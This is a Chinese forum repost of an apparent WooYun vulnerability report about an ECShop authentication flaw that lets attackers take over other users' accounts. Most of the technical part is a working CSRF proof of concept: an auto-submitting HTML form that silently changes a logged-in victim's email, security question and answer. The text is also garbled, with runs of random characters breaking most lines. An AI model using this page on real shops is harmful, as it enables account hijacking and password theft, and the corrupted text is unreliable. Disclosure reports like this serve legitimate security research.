简要描述:
+ h# P4 P. M D+ \! V6 Aecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
4 m( V8 B$ {8 x
2 O0 O* L: h% P2 SDemo For:http://www.wooyun.org/bug.php?action=view&id=395
4 ~. P1 ^# h3 O5 o# i& Q9 ^: c5 \
$ j4 Z0 {! C+ g详细说明:/ \1 Q3 i9 p& \. }, B4 G) k' K
利用csrf和xss可以突破官方所说的“障碍”
' i) U1 V$ q/ i, V$ Qxss版本已经有人说明
* B! P- n6 ^& I3 N9 b/ P& S# }这里给出csrf版本
: F& Z3 g1 [7 ?! i' k7 y: F5 o( c, D+ C3 n! E) |+ R% y
漏洞证明:2 w [/ ~9 x0 j( u5 j, z
<html>
0 _- a3 e- z4 m4 G( I9 \<body>
5 i" i1 R) S/ N3 ~. q- X* N<form action="http://www.wooyun.org/ecshop/user.php" method="POST">% A4 _( t* g) i+ L
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">9 P4 f, X8 e9 F3 Z
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
/ F1 s i2 U8 M& Y<INPUT TYPE="text" NAME="sel_question" value="ecshop">
: b1 T p8 a3 C7 \<INPUT TYPE="text" NAME="passwd_answer" value="exploit">) C& \/ H, n' O( v$ y G7 H
</body>
9 ]* v1 p, l9 i0 n L; `- H<script>: E5 ?4 b) m! L$ Z( V& D
document.forms[0].submit();
. r7 G) e1 x+ f. T# a9 K' b</script>
; V% `1 U( T9 h: K5 q3 H</html>
! H; m2 @3 D" \* R" ~( |构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失6 |' z& k: W3 o3 ^# Y
7 K$ U- {* D9 W# U0 S, V |
发表于 2013-2-20 08:30:14
收藏
支持
反对